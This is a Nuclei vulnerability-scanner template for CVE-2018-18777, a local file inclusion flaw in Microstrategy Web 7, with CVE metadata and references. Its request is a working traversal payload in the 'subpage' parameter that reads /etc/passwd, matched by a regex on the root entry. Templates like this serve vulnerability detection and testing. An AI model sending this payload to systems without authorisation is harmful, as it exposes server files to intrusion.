nuclei-templates/cves/2018/CVE-2018-18777.yaml

37 lines
1.2 KiB
YAML

id: CVE-2018-18777
info:
name: Microstrategy Web 7 - Local File Inclusion
author: 0x_Akoko
severity: medium
description: |
Microstrategy Web 7 is vulnerable to local file inclusion via "/WebMstr7/servlet/mstrWeb" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.
reference:
- https://www.exploit-db.com/exploits/45755
- http://packetstormsecurity.com/files/150059/Microstrategy-Web-7-Cross-Site-Scripting-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-18777
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2018-18777
cwe-id: CWE-22
tags: traversal,edb,packetstorm,cve,cve2018,microstrategy,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/22